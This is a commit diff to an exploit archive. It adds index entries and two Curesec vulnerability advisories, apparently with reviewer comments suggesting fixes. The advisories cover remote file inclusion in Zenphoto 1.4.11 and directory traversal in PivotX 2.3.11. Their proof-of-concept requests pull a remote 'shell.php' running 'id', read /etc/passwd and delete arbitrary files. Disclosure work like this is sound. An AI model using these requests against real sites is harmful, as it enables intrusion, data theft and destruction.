DB: 2016-03-18
2 new exploits file Zenphoto 1.4.11 - Remote File Inclusion Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability file PivotX 2.3.11 - Directory Traversal
parent
9deb7ec89d
commit
49a8e7debd
3 changed files with 186 additions and 1 deletions
|
@ -13243,6 +13243,7 @@ id,file,description,date,author,platform,type,port
|
|||
15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
|
||||
15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
|
||||
15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
|
||||
39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
|
||||
15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0
|
||||
15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
|
@ -33347,7 +33348,7 @@ id,file,description,date,author,platform,type,port
|
|||
36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
|
||||
36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
|
||||
36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
|
||||
36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
|
||||
36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
|
||||
36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0
|
||||
36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0
|
||||
36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0
|
||||
|
@ -35803,3 +35804,4 @@ id,file,description,date,author,platform,type,port
|
|||
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
|
||||
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
|
||||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
|
|
|
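--- a/platforms/php/webapps/39571.txt
+++ b/platforms/php/webapps/39571.txt
@@ -0,0 +1,105 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product: Zenphoto 1.4.11
+Fixed in: 1.4.12
+Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
+zenphoto-1.4.12.zip
+Vendor Website: http://www.zenphoto.org/
+Vulnerability Type: RFI
+Remote Exploitable: Yes
+Reported to vendor: 01/29/2016
+Disclosed to 03/15/2016
+public:
+Release mode: Coordinated Release
+CVE: n/a
+Credits Tim Coen of Curesec GmbH
+
+2. Overview
+
+Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
+vulnerable to remote file inclusion. An admin account is required.
+
+3. Details
+
+Description
+
+CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
+
+When downloading a log file, the input is not properly sanitized, leading to
+RFI.
+
+An admin account is required, and allow_url_fopen must be set to true - which
+is the default setting.
+
+In old versions of PHP, this would additionally lead to LFI via null byte
+poisoning or path expansion, regardless of allow_url_fopen settings.
+
+Proof of Concept
+
+GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
+logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
+security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
+
+Code
+
+// admin-logs.php (sanitize(x, 3) only strips out tags)
+case 'download_log':
+$zipname = sanitize($_GET['tab'], 3) . '.zip';
+if (class_exists('ZipArchive')) {
+$zip = new ZipArchive;
+$zip->open($zipname, ZipArchive::CREATE);
+$zip->addFile($file, basename($file));
+$zip->close();
+ob_get_clean();
+header("Pragma: public");
+header("Expires: 0");
+header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+header("Cache-Control: private", false);
+header("Content-Type: application/zip");
+header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: " . filesize($zipname));
+readfile($zipname);
+// remove zip file from temp path
+unlink($zipname);
+exit;
+} else {
+include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
+$zip = new ZipStream($zipname);
+$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
+$zip->finish();
+}
+break;
+
+4. Solution
+
+To mitigate this issue please upgrade at least to version 1.4.12:
+
+https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
+
+Please note that a newer version might already be available.
+
+5. Report Timeline
+
+01/29/2016 Informed Vendor about Issue
+01/29/2016 Vendor replies
+02/23/2016 Vendor sends fix for verification
+02/23/2016 Suggested improvements for attempted fix
+02/29/2016 Delayed Disclosure
+03/14/2016 Vendor releases fix
+03/15/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
+
+--
+blog: https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany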
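Review bot: The quoted `download_log` excerpt never shows where `$file` is assigned, yet `$file` is the value passed to `addFile` and `add_file_from_path`, so the actual read sink that makes this an RFI is outside the quoted lines; the advisory would be easier to verify if the excerpt also included the derivation of `$file` from the `tab` and `filename` parameters. The `case` belongs to a `switch` whose start is not in the excerpt either. On the code itself, `sanitize($_GET['tab'], 3)` is a tag filter, not a path check, so the durable mitigation is to accept `tab` only from a fixed list of known log names before any filename is built, e.g. `if (!in_array($_GET['tab'], $knownLogNames /* allowlist */, true)) { exit; }`, rather than stripping characters from it.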
78
platforms/php/webapps/39572.txt
Executable file
78
platforms/php/webapps/39572.txt
Executable file
|
@ -0,0 +1,78 @@
|
|||
Security Advisory - Curesec Research Team
|
||||
|
||||
1. Introduction
|
||||
|
||||
Affected Product: PivotX 2.3.11
|
||||
Fixed in: not fixed
|
||||
Fixed Version Link: n/a
|
||||
Vendor Website: http://pivotx.net/
|
||||
Vulnerability Type: Directory Traversal
|
||||
Remote Exploitable: Yes
|
||||
Reported to vendor: 01/20/2016
|
||||
Disclosed to public: 03/15/2016
|
||||
Release mode: Full Disclosure
|
||||
CVE: n/a
|
||||
Credits Tim Coen of Curesec GmbH
|
||||
|
||||
2. Overview
|
||||
|
||||
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
|
||||
vulnerable to Directory Traversal, allowing authenticated users to read and
|
||||
delete files outside of the PivotX directory.
|
||||
|
||||
3. Details
|
||||
|
||||
Description
|
||||
|
||||
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
|
||||
|
||||
The function cleanPath which is responsible for sanitizing path names can be
|
||||
bypassed by an attacker, leading to directory traversal in multiple places.
|
||||
|
||||
Proof of Concept
|
||||
|
||||
Admins and Superadmins can read any file:
|
||||
|
||||
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
|
||||
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
|
||||
/.....//...//.....//...//.....//...//.....//...//etc/passwd
|
||||
|
||||
Advanced users, Admins and Superadmins can delete any file, possibly leading to
|
||||
DOS:
|
||||
|
||||
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
|
||||
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
|
||||
important.file&pivotxsession=ovyyn4ob2jc5ym92
|
||||
|
||||
Code
|
||||
|
||||
lib.php
|
||||
function cleanPath($path) {
|
||||
$path = str_replace('../', '', $path);
|
||||
$path = str_replace('..\\', '', $path);
|
||||
$path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
|
||||
return $path;
|
||||
}
|
||||
|
||||
4. Solution
|
||||
|
||||
This issue was not fixed by the vendor.
|
||||
|
||||
5. Report Timeline
|
||||
|
||||
01/20/2016 Informed Vendor about Issue
|
||||
01/29/2016 Vendor replies, PivotX is not maintained anymore
|
||||
03/15/2016 Disclosed to public
|
||||
|
||||
|
||||
Blog Reference:
|
||||
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
|
||||
|
||||
--
|
||||
blog: https://blog.curesec.com
|
||||
tweet: https://twitter.com/curesec
|
||||
|
||||
Curesec GmbH
|
||||
Curesec Research Team
|
||||
Romain-Rolland-Str 14-24
|
||||
13089 Berlin, Germany
|
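Review bot: `cleanPath` in the quoted `lib.php` excerpt is a single-pass `str_replace`, so removing `../` from the middle of a longer dot-and-slash sequence can leave a fresh `../` behind, which is what the PoC inputs rely on; looping the replacement would not make it safe either, because a stripping filter never establishes where the resulting path actually points. Since the timeline records the vendor as no longer maintaining PivotX and the Solution section offers no fix, anyone still carrying this code should replace the filter with canonicalisation plus a containment check: resolve the joined path with `realpath()`, resolve the intended base directory the same way, and reject the request when the result is `false` or does not start with the base directory followed by `DIRECTORY_SEPARATOR`. The advisory could also state which callers of `cleanPath` were confirmed (only the `view` and `del` paths are shown), since "multiple places" is otherwise unverifiable from the excerpt.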